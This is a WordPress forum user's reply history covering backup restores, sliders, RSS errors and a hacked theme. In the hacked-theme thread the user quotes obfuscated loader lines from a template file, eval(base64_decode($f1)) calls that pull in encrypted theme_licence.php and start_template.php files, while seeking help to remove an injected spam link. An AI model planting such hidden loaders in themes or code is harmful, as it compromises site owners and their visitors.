niccolls
Forum Replies Created
-
I received this response from Updraft, but it is not working:
“When restoring site on a new host but same domain or URL, UpdraftPlus free version can do the essence. UpdraftPlus free version already has a restoration feature.”
backup-mysite-20170411-031556-MMwolVSwzCnWf4TB5tmjtTASPtzRrG.zip
It was set to backup plugins, themes, uploads, database, others
Forum: Plugins
In reply to: Meta Slider Only on Home PageAnyone else have a idea how I can debug this slider?
Forum: Plugins
In reply to: Meta Slider Only on Home PageYep, I tried that. I deactivated them, and reactivated them one by one.
They are the same plugins on both sites.Forum: Plugins
In reply to: Any Suggestions On Locating This Hacked Viagra Link?Amazing!! I really appreciate your help! The next time you’re in Dallas, I’ll owe you a dinner!
I also had to remove the
<?php start_template(); ?>
code from just under the<body>
tag in the header.php.I’ve removed and deleted those files.
Lesson learned however. I had downloaded a couple other templates from this site. Go to the original source..
Once again… thank you for your help!
Rich
Forum: Plugins
In reply to: Any Suggestions On Locating This Hacked Viagra Link?Sorry about the *strong* */strong* in the code above. I tried to bold the places in the code, and instead it just kept the code.
So, disregard the bold references.
Forum: Plugins
In reply to: Any Suggestions On Locating This Hacked Viagra Link?cnorris23, thanks for checking on that. It is MUCH appreciated.
I downloaded that theme from https://www.wordpresstemplates.com
I found reference to the theme_license.php in 3 files: functions.php, header.php, sidebar.php
I also found refernce to the
start_template()
in 1 file: header.phpThe most interesting one is on the header.php, right below the <body> tag where the hacked link appears.
FUNCTIONS.PHP CODE
<?php function decode_it($code) { return base64_decode(base64_decode($code)); } require_once(pathinfo(__FILE__,PATHINFO_DIRNAME)."/start_template.php"); <strong>require_once("theme_licence.php"); </strong>add_action('wp_footer','print_footer'); if ( function_exists('register_sidebar') ) register_sidebar(array('name'=>'Sidebar')); ?>
HEADER.PHP CODE
<meta http-equiv="Content-Type" content="<?php require_once("theme_licence.php"); eval(base64_decode($f1)); bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />
<body> <strong><?php start_template(); ?></strong> <div class="wrapper"> <div class="menu">
SIDEBAR.PHP CODE
<div id="sidebar"> <ul> <?php require_once("theme_licence.php"); if(!function_exists("get_credits")) { eval(base64_decode($f1)); } if ( function_exists('dynamic_sidebar') && dynamic_sidebar('sidebar') ) : else : ?> <?php wp_list_categories('orderby=name&show_count=0&title_li=<h2>Categories</h2>'); ?>
Finally, when you look at the theme_license.php file, it is all encrypted information with about 2 pages of solid encrypted characters.
There is also another file, start_template.php, which is also encrypted. I’m not sure if that was in your download or not.
Once again, thank you for your time and response.
Rich
Forum: Plugins
In reply to: Any Suggestions On Locating This Hacked Viagra Link?If it’s not in the files (at least that I could find), where else can I look?
Forum: Plugins
In reply to: Any Suggestions On Locating This Hacked Viagra Link?I found the base64_decode in a theme file for the theme_license.php I commented out the lines, but it did not remove the hacked link.
I upgraded from 2.7 to 2.9.1 as well as updating all of my plugins. That did not remove the link.
I have also reuploaded the theme files and resinstalled the WP files.
The hacked link still is there. Any other suggestions?
Forum: Fixing WordPress
In reply to: Adding verticle space in the side barhttps://www.fibro-myalgia.com/fibroblog/
Down on the right, below the Adsense. I am wanting to add some more items such as “Recently Posted” and “Syndicate” but I am wanting to add a full space between them. Similar to what a <br><br> would do in HTML.
Forum: Fixing WordPress
In reply to: No title appearing in my RSS feedYes, I have “Christian Girls Club” on the Options/General page.
None of my plugins are active… at least according to the control panel. I just started building the site today. Do I need to change the compliance code in the header.php?
Forum: Fixing WordPress
In reply to: No title appearing in my RSS feedhmmm… and now my rss feed has disappeared. Incredible. It was here a minute ago.
Forum: Fixing WordPress
In reply to: How to align the sidebar to the topI believe this is my problem. The left column is on top of the right column, rather than side-by-side. How can I widen the columns? Which file do I need to make this change in?
Thanks!
Forum: Fixing WordPress
In reply to: RSS Not Working.That was it. Thanks so much… that’s a great tool!
I appreciate your help!
Forum: Fixing WordPress
In reply to: RSS Not Working.I have been going through the forums for the last few hours. My site is new and I haven’t activated any plugins yet. There are no active plugins according to my admin page.
I applied the change from the above link and continued to get the same error message:
“The XML page cannot be displayed
Cannot view XML input using XSL style sheet. Please correct the error and then click the Refresh button, or try again later.I appreciate your input.